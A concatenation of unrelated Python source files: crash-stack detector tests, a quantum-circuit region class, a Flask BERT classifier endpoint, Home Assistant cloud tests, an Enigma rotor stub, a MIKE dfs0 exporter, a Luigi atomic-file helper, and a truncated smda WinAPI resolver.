StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
# After the ``is_first_stack_flag`` is set to False, the priority will be
# 1.
self.assertTupleEqual(
stack_detector('blabla: runtime error: blabla', flag_manager),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy', flag_manager))
def testMsanDetector(self):
"""Tests that ``MsanDetector`` detects memory sanitizer callstack."""
stack_detector = callstack_detectors.MsanDetector()
self.assertTupleEqual(
stack_detector('Uninitialized value was created by'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
# After the ``is_first_stack_flag`` is set to False, the priority will be
# 1.
self.assertTupleEqual(
stack_detector('Uninitialized value was stored to'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('==123== ERROR:MemorySanitizer'),
StartOfCallStack(2, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testAsanDetector(self):
"""Tests that ``AsanDetector`` detects address sanitizer callstack."""
stack_detector = callstack_detectors.AsanDetector()
self.assertTupleEqual(
stack_detector('==123== ERROR:AddressSanitizer'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
# After the ``is_first_stack_flag`` is set to False, the priority will be
# 1.
self.assertTupleEqual(
stack_detector('READ of size 32 at backtrace:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('freed by thread T99 here:'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('previously allocated by thread T1 here:'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('Thread T9 created by'),
StartOfCallStack(1, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testLibFuzzerDectector(self):
"""Tests that ``LibFuzzerDetector`` detects libFuzzer crash."""
stack_detector = callstack_detectors.LibFuzzerDetector()
self.assertTupleEqual(
stack_detector('==123==ERROR: libFuzzer'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testDirectLeakDetector(self):
"""Tests that ``DirectLeakDectector`` detects ``Direct-Leak`` crash."""
stack_detector = callstack_detectors.DirectLeakDetector()
self.assertTupleEqual(
stack_detector(
'Direct leak of 8 byte(s) in 1 object(s) allocated from:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testIndirectLeakDetector(self):
"""Tests that ``IndirectLeakDectector`` detects ``Indirect-Leak`` crash."""
stack_detector = callstack_detectors.IndirectLeakDetector()
self.assertTupleEqual(
stack_detector('Indirect leak of 80 byte(s) in 1 object(s) allocated '
'from:'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('dummy'))
def testChromeCrashDetector(self):
"""Tests that ``ChromeCrashDetector`` detects Fracas/Cracas callstack."""
stack_detector = callstack_detectors.ChromeCrashStackDetector()
self.assertTupleEqual(
stack_detector('CRASHED [EXC @ 0x508]'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertTupleEqual(
stack_detector('(JAVA) CRASHED [EXC @ 0x508]'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.JAVA, {}))
self.assertIsNone(stack_detector('dummy'))
def testGeneralSanitizerDetector(self):
"""Tests that ``GeneralSanitizerDetector`` returns a StartOfCallStack."""
stack_detector = callstack_detectors.GeneralSanitizerDetector()
self.assertTupleEqual(
stack_detector('==28956==ERROR: UndefinedBehaviorSanitizer:'),
StartOfCallStack(2, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('blabla...'))
def testCheckFailureDetector(self):
"""Tests that ``CheckFailureDetector`` detects check failure stack."""
stack_detector = callstack_detectors.CheckFailureDetector()
self.assertTupleEqual(
stack_detector(
'[FATAL:Vector.h(1829)] Check failed: position <= size()'),
StartOfCallStack(0, CallStackFormatType.DEFAULT, LanguageType.CPP, {}))
self.assertIsNone(stack_detector('blabla...'))
|
"""This module implements the CircuitRegion class."""
from __future__ import annotations
import logging
from typing import Any
from typing import Iterator
from typing import Mapping
from typing import Union
from typing_extensions import TypeGuard
from bqskit.ir.interval import CycleInterval
from bqskit.ir.interval import IntervalLike
from bqskit.ir.location import CircuitLocation
from bqskit.ir.point import CircuitPoint
from bqskit.ir.point import CircuitPointLike
from bqskit.utils.typing import is_integer
from bqskit.utils.typing import is_mapping
_logger = logging.getLogger(__name__)
class CircuitRegion(Mapping[int, CycleInterval]):
"""
The CircuitRegion class.
A CircuitRegion is an contiguous, convex area in a circuit. It is
represented as a map from qudit indices to cycle intervals.
"""
def __init__(self, intervals: Mapping[int, IntervalLike]) -> None:
"""
CircuitRegion Initializer.
Args:
intervals (Mapping[int, IntervalLike]): A map from qudit
indices to cycle intervals. The cycle intervals can
be given as either a CycleInterval object or a tuple
of two ints that represent the lower and upper bound
of the inclusive interval.
Notes:
All cycle intervals are inclusive.
"""
if not is_mapping(intervals):
raise TypeError(
f'Expected mapping from int to IntervalLike, got {intervals}.',
)
for qudit, interval in intervals.items():
if not is_integer(qudit):
raise TypeError(f'Expected integer keys, got {qudit}.')
if not CycleInterval.is_interval(interval):
raise TypeError(
f'Expected valid CycleInterval, got {interval}.',
)
self._intervals = {
qudit: CycleInterval(interval)
for qudit, interval in intervals.items()
}
def __getitem__(self, key: int) -> CycleInterval:
"""
Return the interval given by the qudit `key`.
Raises:
IndexError: If `key` is not in this region.
"""
return self._intervals[key]
def __iter__(self) -> Iterator[int]:
"""Return an iterator for all qudits contained in the region."""
return iter(self._intervals)
def __len__(self) -> int:
"""Return the number of qudits in the region."""
return len(self._intervals)
@property
def min_cycle(self) -> int:
"""
Return the smallest cycle index for any qudit.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have minimum cycle.')
return min(interval.lower for interval in self.values())
@property
def max_cycle(self) -> int:
"""
Return the largest cycle index for any qudit.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have maximum cycle.')
return max(interval.upper for interval in self.values())
@property
def max_min_cycle(self) -> int:
"""
Return the largest cycle index for any lower bound.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have minimum cycle.')
return max(interval.lower for interval in self.values())
@property
def min_max_cycle(self) -> int:
"""
Return the smallest cycle index for any upper bound.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have maximum cycle.')
return min(interval.upper for interval in self.values())
@property
def min_qudit(self) -> int:
"""
Return the smallest qudit index.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have minimum qudit.')
return min(self.keys())
@property
def max_qudit(self) -> int:
"""
Return the largest qudit index.
Raises:
ValueError: If `self` is empty.
"""
if self.empty:
raise ValueError('Empty region cannot have maximum qudit.')
return max(self.keys())
@property
def location(self) -> CircuitLocation:
"""Return the qudits this region includes as a CircuitLocation."""
return CircuitLocation(sorted(self.keys()))
@property
def points(self) -> list[CircuitPoint]:
"""Return the points described by this region."""
return [
CircuitPoint(cycle_index, qudit_index)
for qudit_index, intervals in self.items()
for cycle_index in intervals.indices
]
@property
def volume(self) -> int:
"""Return the volume of this region measured in qudit-cycles."""
return sum(len(interval) for interval in self.values())
@property
def width(self) -> int:
"""Return the number of cycles this region participates in."""
if self.empty:
return 0
return self.max_cycle - self.min_cycle + 1
@property
def empty(self) -> bool:
"""Return true if this region is empty."""
return len(self) == 0
def shift_left(self, amount_to_shift: int) -> CircuitRegion:
"""
Shift the region to the left by `amount_to_shift`.
Args:
amount_to_shift (int): Subtract `amount_to_shift` from all
cycle indices.
Raises:
ValueError: If the region would be shifted below zero as a
result of performing this operation.
"""
if not is_integer(amount_to_shift):
raise TypeError(
f'Expected integer for shift amount, got {amount_to_shift}.',
)
if self.empty:
return CircuitRegion(self._intervals)
if self.min_cycle - amount_to_shift < 0:
raise ValueError(
f'Cannot shift region to the left by {amount_to_shift}.',
)
return CircuitRegion({
qudit_index:
CycleInterval(
interval[0] - amount_to_shift,
interval[1] - amount_to_shift,
)
for qudit_index, interval in self._intervals.items()
})
def shift_right(self, amount_to_shift: int) -> CircuitRegion:
"""
Shift the region to the right by `amount_to_shift`.
Args:
amount_to_shift (int): Add `amount_to_shift` to all
cycle indices.
"""
if not is_integer(amount_to_shift):
raise TypeError(
f'Expected integer for shift amount, got {amount_to_shift}.',
)
if self.empty:
return CircuitRegion(self._intervals)
if amount_to_shift < 0:
return self.shift_left(-amount_to_shift)
return CircuitRegion({
qudit_index:
CycleInterval(
interval[0] + amount_to_shift,
interval[1] + amount_to_shift,
)
for qudit_index, interval in self._intervals.items()
})
def overlaps(self, other: CircuitPointLike | CircuitRegionLike) -> bool:
"""Return true if `other` overlaps this region."""
if CircuitPoint.is_point(other):
other = CircuitPoint(*other)
if other.qudit not in self:
return False
intervals = self[other.qudit]
return intervals.lower <= other.cycle <= intervals.upper
if CircuitRegion.is_region(other):
other = CircuitRegion(other)
if other.empty or self.empty:
return False
if self.min_cycle > other.max_cycle:
return False
if self.max_cycle < other.min_cycle:
return False
qudit_intersection = self.location.intersection(other.location)
if len(qudit_intersection) == 0:
return False
for qudit in qudit_intersection:
if (
self[qudit].lower <= other[qudit].upper
and self[qudit].upper >= other[qudit].lower
):
return True
return False
raise TypeError(
'Expected either CircuitPoint or CircuitRegion, got %s.'
% type(other),
)
def __contains__(self, other: object) -> bool:
if is_integer(other):
return other in self._intervals.keys()
if CircuitPoint.is_point(other):
return other[1] in self.keys() and other[0] in self[other[1]]
if CircuitRegion.is_region(other):
other = CircuitRegion(other)
if other.empty:
return True
if self.empty:
return False
return (
all(qudit in self.keys() for qudit in other.keys())
and all(
self[qudit].lower <= other[qudit][0] <= self[qudit].upper
for qudit in other.keys()
)
and all(
self[qudit].lower <= other[qudit][1] <= self[qudit].upper
for qudit in other.keys()
)
)
return NotImplemented
def transpose(self) -> dict[int, list[int]]:
"""Flip region to map cycle indices to qudit indices."""
if self.empty:
return {}
qudit_cycles: dict[int, list[int]] = {
i: []
for i in range(self.min_cycle, self.max_cycle + 1)
}
for qudit_index, intervals in sorted(self.items()):
for cycle_index in range(intervals.lower, intervals.upper + 1):
qudit_cycles[cycle_index].append(qudit_index)
return {k: v for k, v in qudit_cycles.items() if len(v) > 0}
def intersection(self, other: CircuitRegionLike) -> CircuitRegion:
if not CircuitRegion.is_region(other):
raise TypeError(f'Expected CircuitRegion, got {type(other)}.')
other = CircuitRegion(other)
location = self.location.intersection(other.location)
region: dict[int, CycleInterval] = {}
for qudit in location:
if self[qudit].overlaps(other[qudit]):
region[qudit] = self[qudit].intersection(other[qudit])
return CircuitRegion(region)
def union(self, other: CircuitRegionLike) -> CircuitRegion:
if not CircuitRegion.is_region(other):
raise TypeError(f'Expected CircuitRegion, got {type(other)}.')
other = CircuitRegion(other)
location = self.location.union(other.location)
region: dict[int, CycleInterval] = {}
for qudit in location:
if qudit in self and qudit in other:
region[qudit] = self[qudit].union(other[qudit])
elif qudit in self:
region[qudit] = self[qudit]
elif qudit in other:
region[qudit] = other[qudit]
return CircuitRegion(region)
def depends_on(self, other: CircuitRegionLike) -> bool:
"""Return true if self depends on other."""
if not isinstance(other, CircuitRegion):
other = CircuitRegion(other)
intersection = self.location.intersection(other.location)
if len(intersection) != 0:
return all(other[qudit] < self[qudit] for qudit in intersection)
return False
def dependency(self, other: CircuitRegionLike) -> int:
"""
Return 1 if self depends on other.
Return -1 if other depends on self. Return 0 if no dependency.
"""
if not isinstance(other, CircuitRegion):
other = CircuitRegion(other)
intersection = self.location.intersection(other.location)
if not intersection:
return 0
for qudit in intersection:
if other[qudit] < self[qudit]:
return 1
return -1
def __eq__(self, other: object) -> bool:
if CircuitRegion.is_region(other):
other = CircuitRegion(other)
return sorted(self.items()) == sorted(other.items())
return NotImplemented
def __hash__(self) -> int:
return tuple(sorted(self.items())).__hash__()
def __str__(self) -> str:
return str(self._intervals)
def __repr__(self) -> str:
return repr(self._intervals)
def __lt__(self, other: object) -> bool:
if CircuitPoint.is_point(other):
other = CircuitPoint(*other)
if other[0] < self.min_cycle:
return True
if other[1] in self.keys():
return other[0] < self[other[1]].lower
elif CircuitRegion.is_region(other):
other = CircuitRegion(other)
if len(self.location.intersection(other.location)) != 0:
lt = None
for qudit in self.location.intersection(other.location):
if lt is None:
lt = self[qudit] < other[qudit]
elif lt != (self[qudit] < other[qudit]):
raise ValueError('Both regions depend on each other.')
assert lt is not None
return lt
lower_intervals = tuple(sorted({x.lower for x in self.values()}))
other_lower_intervals = tuple(
sorted({x.lower for x in other.values()}),
)
upper_intervals = tuple(
reversed(sorted({x.upper for x in self.values()})),
)
other_upper_intervals = tuple(
reversed(sorted({x.upper for x in other.values()})),
)
return (lower_intervals, upper_intervals) < (
other_lower_intervals, other_upper_intervals,
)
return NotImplemented
@staticmethod
def is_region(region: Any) -> TypeGuard[CircuitRegionLike]:
"""Return true if region is a CircuitRegionLike."""
if isinstance(region, CircuitRegion):
return True
if not is_mapping(region):
_logger.debug('Region is not a mapping.')
return False
if not all(is_integer(key) for key in region.keys()):
_logger.debug('Region does not have integer keys.')
return False
if not all(CycleInterval.is_interval(val) for val in region.values()):
_logger.debug('Region does not have IntervalLike values.')
return False
return True
CircuitRegionLike = Union[Mapping[int, IntervalLike], CircuitRegion]
|
# -*- coding: utf-8 -*-
import argparse
import json
import requests
import tokenization
from flask import Flask
from flask import request, jsonify
import numpy as np
app = Flask(__name__)
app.config['JSON_AS_ASCII'] = False
headers = {
'content-type': "application/json",
'cache-control': "no-cache"
}
cola_label_list = ["ungrammatical", "grammatical"]
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
def convert_single_example(max_seq_length,
tokenizer, text_a, text_b=None):
tokens_a = tokenizer.tokenize(text_a)
tokens_b = None
if text_b:
tokens_b = tokenizer.tokenize(text_b) # 这里主要是将中文分字
if tokens_b:
_truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[0:(max_seq_length - 2)]
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
if tokens_b:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens) # 将中文转换成ids
input_mask = [1] * len(input_ids)
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
return input_ids, input_mask, segment_ids # 对应的就是创建bert模型时候的input_ids,input_mask,segment_ids 参数
# 预训练或者自训练的词表文件
vocab_file = "bert_tiny/vocab.txt"
token = tokenization.FullTokenizer(vocab_file=vocab_file)
def detect_bert(content):
input_ids, input_mask, segment_ids = convert_single_example(128, token, content)
features = {}
features["input_ids"] = input_ids
features["input_mask"] = input_mask
features["segment_ids"] = segment_ids
features["label_ids"] = 0
data_list = []
data_list.append(features)
data = json.dumps({"signature_name": "serving_default", "instances": data_list})
headers = {"content-type": "application/json"}
# 根据自己的服务ip 端口号和model_name修改
json_response = requests.post('http://0.0.0.0:8809/v1/models/cola:predict', data=data, headers=headers)
print(data, json_response.text)
json_response_text = json.loads(json_response.text)
model_result = {}
for (i, class_label) in enumerate(cola_label_list):
model_result[class_label]=json_response_text['predictions'][0][i]
classify_result = {}
classify_result = {}
arg_max_ind = np.argmax(json_response_text['predictions'][0])
classify_result['name'] = cola_label_list[arg_max_ind]
classify_result['score'] = json_response_text['predictions'][0][arg_max_ind]
result = {}
result['modelResult'] = model_result
result['classifyResult'] = classify_result
#return jsonify(json.loads(result))
return result
@app.route('/classify', methods=['GET'])
def detect():
if 'id' not in request.args.keys():
raise Exception('task_id is empty.....')
if 'query' not in request.args.keys():
raise Exception('query is empty.....')
query = request.args.get("query")
id = request.args.get('id', 'cola')
if id != 'cola':
raise Exception('Task-id is not cola')
return detect_bert(query)
if __name__ == '__main__':
app.run(host='0.0.0.0')
# http://ip:port/classify?id=cola&query=hello
|
"""Test the cloud.iot module."""
from unittest.mock import MagicMock, patch
from aiohttp import web
import pytest
from homeassistant.components.cloud import DOMAIN
from homeassistant.components.cloud.client import CloudClient
from homeassistant.components.cloud.const import PREF_ENABLE_ALEXA, PREF_ENABLE_GOOGLE
from homeassistant.core import State
from homeassistant.setup import async_setup_component
from . import mock_cloud, mock_cloud_prefs
from tests.common import mock_coro
from tests.components.alexa import test_smart_home as test_alexa
@pytest.fixture
def mock_cloud_inst():
"""Mock cloud class."""
return MagicMock(subscription_expired=False)
async def test_handler_alexa(hass):
"""Test handler Alexa."""
hass.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
hass.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
await mock_cloud(
hass,
{
"alexa": {
"filter": {"exclude_entities": "switch.test2"},
"entity_config": {
"switch.test": {
"name": "Config name",
"description": "Config description",
"display_categories": "LIGHT",
}
},
}
},
)
mock_cloud_prefs(hass)
cloud = hass.data["cloud"]
resp = await cloud.client.async_alexa_message(
test_alexa.get_new_request("Alexa.Discovery", "Discover")
)
endpoints = resp["event"]["payload"]["endpoints"]
assert len(endpoints) == 1
device = endpoints[0]
assert device["description"] == "Config description via Home Assistant"
assert device["friendlyName"] == "Config name"
assert device["displayCategories"] == ["LIGHT"]
assert device["manufacturerName"] == "Home Assistant"
async def test_handler_alexa_disabled(hass, mock_cloud_fixture):
"""Test handler Alexa when user has disabled it."""
mock_cloud_fixture._prefs[PREF_ENABLE_ALEXA] = False
cloud = hass.data["cloud"]
resp = await cloud.client.async_alexa_message(
test_alexa.get_new_request("Alexa.Discovery", "Discover")
)
assert resp["event"]["header"]["namespace"] == "Alexa"
assert resp["event"]["header"]["name"] == "ErrorResponse"
assert resp["event"]["payload"]["type"] == "BRIDGE_UNREACHABLE"
async def test_handler_google_actions(hass):
"""Test handler Google Actions."""
hass.states.async_set("switch.test", "on", {"friendly_name": "Test switch"})
hass.states.async_set("switch.test2", "on", {"friendly_name": "Test switch 2"})
hass.states.async_set("group.all_locks", "on", {"friendly_name": "Evil locks"})
await mock_cloud(
hass,
{
"google_actions": {
"filter": {"exclude_entities": "switch.test2"},
"entity_config": {
"switch.test": {
"name": "Config name",
"aliases": "Config alias",
"room": "living room",
}
},
}
},
)
mock_cloud_prefs(hass)
cloud = hass.data["cloud"]
reqid = "5711642932632160983"
data = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
with patch(
"hass_nabucasa.Cloud._decode_claims",
return_value={"cognito:username": "myUserName"},
):
await cloud.client.get_google_config()
resp = await cloud.client.async_google_message(data)
assert resp["requestId"] == reqid
payload = resp["payload"]
assert payload["agentUserId"] == "myUserName"
devices = payload["devices"]
assert len(devices) == 1
device = devices[0]
assert device["id"] == "switch.test"
assert device["name"]["name"] == "Config name"
assert device["name"]["nicknames"] == ["Config name", "Config alias"]
assert device["type"] == "action.devices.types.SWITCH"
assert device["roomHint"] == "living room"
async def test_handler_google_actions_disabled(hass, mock_cloud_fixture):
"""Test handler Google Actions when user has disabled it."""
mock_cloud_fixture._prefs[PREF_ENABLE_GOOGLE] = False
with patch("hass_nabucasa.Cloud.start", return_value=mock_coro()):
assert await async_setup_component(hass, "cloud", {})
reqid = "5711642932632160983"
data = {"requestId": reqid, "inputs": [{"intent": "action.devices.SYNC"}]}
cloud = hass.data["cloud"]
resp = await cloud.client.async_google_message(data)
assert resp["requestId"] == reqid
assert resp["payload"]["errorCode"] == "deviceTurnedOff"
async def test_webhook_msg(hass):
"""Test webhook msg."""
with patch("hass_nabucasa.Cloud.start", return_value=mock_coro()):
setup = await async_setup_component(hass, "cloud", {"cloud": {}})
assert setup
cloud = hass.data["cloud"]
await cloud.client.prefs.async_initialize()
await cloud.client.prefs.async_update(
cloudhooks={
"hello": {"webhook_id": "mock-webhook-id", "cloudhook_id": "mock-cloud-id"}
}
)
received = []
async def handler(hass, webhook_id, request):
"""Handle a webhook."""
received.append(request)
return web.json_response({"from": "handler"})
hass.components.webhook.async_register("test", "Test", "mock-webhook-id", handler)
response = await cloud.client.async_webhook_message(
{
"cloudhook_id": "mock-cloud-id",
"body": '{"hello": "world"}',
"headers": {"content-type": "application/json"},
"method": "POST",
"query": None,
}
)
assert response == {
"status": 200,
"body": '{"from": "handler"}',
"headers": {"Content-Type": "application/json"},
}
assert len(received) == 1
assert await received[0].json() == {"hello": "world"}
async def test_google_config_expose_entity(hass, mock_cloud_setup, mock_cloud_login):
"""Test Google config exposing entity method uses latest config."""
cloud_client = hass.data[DOMAIN].client
state = State("light.kitchen", "on")
gconf = await cloud_client.get_google_config()
assert gconf.should_expose(state)
await cloud_client.prefs.async_update_google_entity_config(
entity_id="light.kitchen", should_expose=False
)
assert not gconf.should_expose(state)
async def test_google_config_should_2fa(hass, mock_cloud_setup, mock_cloud_login):
"""Test Google config disabling 2FA method uses latest config."""
cloud_client = hass.data[DOMAIN].client
gconf = await cloud_client.get_google_config()
state = State("light.kitchen", "on")
assert gconf.should_2fa(state)
await cloud_client.prefs.async_update_google_entity_config(
entity_id="light.kitchen", disable_2fa=True
)
assert not gconf.should_2fa(state)
async def test_set_username(hass):
"""Test we set username during login."""
prefs = MagicMock(
alexa_enabled=False,
google_enabled=False,
async_set_username=MagicMock(return_value=mock_coro()),
)
client = CloudClient(hass, prefs, None, {}, {})
client.cloud = MagicMock(is_logged_in=True, username="mock-username")
await client.logged_in()
assert len(prefs.async_set_username.mock_calls) == 1
assert prefs.async_set_username.mock_calls[0][1][0] == "mock-username"
|
"""
Rotor.py
Author: Colin Page
colin.w.page1@gmail.com
This file holds the Rotor class which defines the functionality
of a single Enigma Rotor
"""
class Rotor():
def __init__(self, rotor_num, start_pos):
self.rotor_num = rotor_num
self.pos = start_pos
if self.rotor_num == 1:
self.letter_map = MAP_ONE
self.back_map = BACK_ONE
elif self.rotor_num == 2:
self.letter_map = MAP_TWO
self.back_map = BACK_TWO
elif self.rotor_num == 3:
self.letter_map = MAP_THREE
self.back_map = BACK_THREE
elif self.rotor_num == 4:
self.letter_map = MAP_FOUR
self.back_map = BACK_FOUR
else:
self.letter_map = MAP_FIVE
self.back_map = BACK_FIVE
def run_letter(letter, forward_pass):
if forward_pass:
map_pos = (letter + self.pos) % 26
return self.letter_map[map_pos]
else:
output = self.back_map[letter] - self.pos
if output < 0:
output += 26
return output % 26
|
from datetime import datetime, timedelta;
from mikecore.DfsFile import *;
from mikecore.DfsFileFactory import *;
def Dfs0ToAscii(dfs0FileName, txtFileName):
'''Writes dfs0 data to text file in similar format as other MIKE Zero tools '''
dfs = DfsFileFactory.DfsGenericOpen(dfs0FileName)
txt = open (txtFileName,"w")
txt.write(" ");
txt.write(dfs.FileInfo.FileTitle);
txt.write("\n");
txt.write(" Time");
for item in dfs.ItemInfo:
txt.write(' {}'.format(item.Name));
txt.write("\n");
txt.write(" Item");
for item in dfs.ItemInfo:
txt.write(' {:11} {:11} {:11}'.format(item.Quantity.Item.value, item.Quantity.Unit.value, item.ValueType.name));
txt.write("\n");
txt.write(" Item");
for item in dfs.ItemInfo:
txt.write(' {:11} {:11} {:11}'.format('"'+item.Quantity.ItemDescription+'"', '"'+item.Quantity.UnitDescription+'"', item.ValueType.name));
txt.write("\n");
isCalendarTime = False;
if (dfs.FileInfo.TimeAxis.TimeAxisType == TimeAxisType.CalendarEquidistant or \
dfs.FileInfo.TimeAxis.TimeAxisType == TimeAxisType.CalendarNonEquidistant):
isCalendarTime = True;
startDateTime = dfs.FileInfo.TimeAxis.StartDateTime;
for i in range (dfs.FileInfo.TimeAxis.NumberOfTimeSteps):
for j in range(len(dfs.ItemInfo)):
itemData = dfs.ReadItemTimeStepNext();
if (j == 0):
if (isCalendarTime):
# TODO: Time unit is not always seconds
itemTime = startDateTime + timedelta(seconds=itemData.Time)
# Depending on the format to write to the file:
#txt.write(itemTime.strftime("%Y-%m-%d %H:%M:%S")); # Seconds accuracy
txt.write(itemTime.strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]); # Milli-seconds accuracy
#txt.write(itemTime.strftime("%Y-%m-%d %H:%M:%S.%f")); # Micro-seconds accuracy
else:
txt.write('{:19.6E}'.format(itemData.Time));
txt.write(' {:18.11E}'.format(itemData.Data[0]));
txt.write("\n");
dfs.Close();
txt.close();
|
# -*- coding: utf-8 -*-
""" This module supplements Luigi's atomic writing within its Target classes.
The subclassed method preserves the suffix of the output target in the temporary file.
"""
import io
import os
import random
import traceback
from contextlib import contextmanager
import luigi
from luigi.local_target import LocalTarget, atomic_file
from luigi.format import FileWrapper, get_default_format
class suffix_preserving_atomic_file(atomic_file):
""" This class provides the method to create the name of a temporary path, preserving the extension
"""
def __init__(self, path=''):
super().__init__(path)
def __enter__(self, path=''):
"""Method to return itself """
return self
def generate_tmp_path(self, path=''):
"""Method to override atomic_file """
dirname, fname = os.path.split(path)
try:
basename, ext = fname.split('.', 1)
except ValueError:
ext = ''
self.__gen_tmppath = dirname + '/' + basename + '-luigi-tmp-%09d' % random.randrange(0, 1e10) + '.' + ext
return self.__gen_tmppath
class BaseAtomicProviderLocalTarget(LocalTarget):
"""This provides the base atomic provider class with 2 methods:
- open()
- temporary_path()
"""
# Allow some composability of atomic handling
atomic_provider = atomic_file
def __init__(self, path=None, format=None, is_tmp=False):
if format is None:
format = get_default_format()
super(LocalTarget, self).__init__(path)
self.format = format
def open(self, mode='r'):
# leverage super()
my_super = super(LocalTarget, self).__init__(self.path)
try:
# Modify LocalTarget.open() to use atomic_provider rather than atomic_file
rwmode = mode.replace('b', '').replace('t', '')
if rwmode == 'w':
self.makedirs()
ipath = self.format.pipe_writer(self.atomic_provider(self.path))
return ipath
elif rwmode == 'r':
fileobj = FileWrapper(io.BufferedReader(io.FileIO(self.path, mode)))
return self.format.pipe_reader(fileobj)
else:
raise Exception("mode must be 'r' or 'w' (got: %s)" % mode)
except Exception:
traceback.print_exc()
@contextmanager
def temporary_path(self):
lpath = self.path
self.makedirs()
with self.atomic_provider(lpath) as af:
yield af.tmp_path
def xxtemporary_path(self):
# Mock
self.makedirs()
af = self.atomic_provider(self.path)
return af
class SuffixPreservingLocalTarget(BaseAtomicProviderLocalTarget):
"""This class returns the temporary path
"""
# Set atomic_provider to the suffix preserving method
atomic_provider = suffix_preserving_atomic_file
# UNIT TEST: To be removed
if __name__ == "__main__":
pass
|
#!/usr/bin/python
import os
import json
import logging
import lief
lief.logging.disable()
from .AbstractLabelProvider import AbstractLabelProvider
from smda.common.labelprovider.OrdinalHelper import OrdinalHelper
LOGGER = logging.getLogger(__name__)
class WinApiResolver(AbstractLabelProvider):
""" Minimal WinAPI reference resolver, extracted from ApiScout """
def __init__(self, config):
self._config = config
self._has_64bit = False
self._api_map = {
"lief": {}
}
self._os_name = None
self._is_buffer = False
for os_name, db_filepath in self._config.API_COLLECTION_FILES.items():
self._loadDbFile(os_name, db_filepath)
self._os_name = os_name
def update(self, binary_info):
self._is_buffer = binary_info.is_buffer
if not self._is_buffer:
#setup import table info from LIEF
lief_binary = lief.parse(bytearray(binary_info.raw_data))
if not isinstance(lief_binary, lief.PE.Binary):
return
for imported_library in lief_binary.imports:
for func in imported_library.entries:
if func.name:
self._api_map["lief"][func.iat_address + binary_info.base_addr] = (imported_library.name.lower(), func.name)
elif func.is_ordinal:
resolved_ordinal = OrdinalHelper.resolveOrdinal(imported_library.name.lower(), func.ordinal)
ordinal_name = resolved_ordinal if resolved_ordinal else "#%s" % func.ordinal
self._api_map["lief"][func.iat_address + binary_info.base_addr] = (imported_library.name.lower(), ordinal_name)
def setOsName(self, os_name):
self._os_name = os_name
def _loadDbFile(self, os_name, db_filepath):
api_db = {}
if os.path.isfile(db_filepath):
with open(db_filepath, "r") as f_json:
api_db = json.loads(f_json.read())
else:
LOGGER.error("Can't find ApiScout collection file: \"%s\" -- continuing without ApiResolver.", db_filepath)
return
num_apis_loaded = 0
api_map = {}
for dll_entry in api_db["dlls"]:
LOGGER.debug(" building address map for: %s", dll_entry)
for export in api_db["dlls"][dll_entry]["exports"]:
num_apis_loaded += 1
api_name = "%s" % (export["name"])
if api_name == "None":
api_name = "None<{}>".format(export["ordinal"])
dll_name = "_".join(dll_entry.split("_")[2:])
bitness = api_db["dlls"][dll_entry]["bitness"]
self._has_64bit |= bitness == 64
base_address = api_db["dlls"][dll_entry]["base_address"]
virtual_address = base_address + export["address"]
api_map[virtual_address] = (dll_name, api_name)
LOGGER.debug("loaded %d exports from %d DLLs (%s).", num_apis_loaded, len(api_db["dlls"]), api_db["os_name"])
self._api_map[os_name] = api_map
def isApiProvider(self):
"""Returns whether the get_api(..) function of the AbstractLabelProvider is functional"""
return True
def getApi(self, to_addr, absolute_addr):
"""If the LabelProvider has any information about a used API for the given address, return (dll, api), else return None"""
# if we work on a dump, use ApiScout method:
if self._is_buffer:
if self._os_name and self._os_name in self._api_map:
return self._api_map[self._os_name].get(absolute_addr, None)
# otherwise take import table info from LIEF
else:
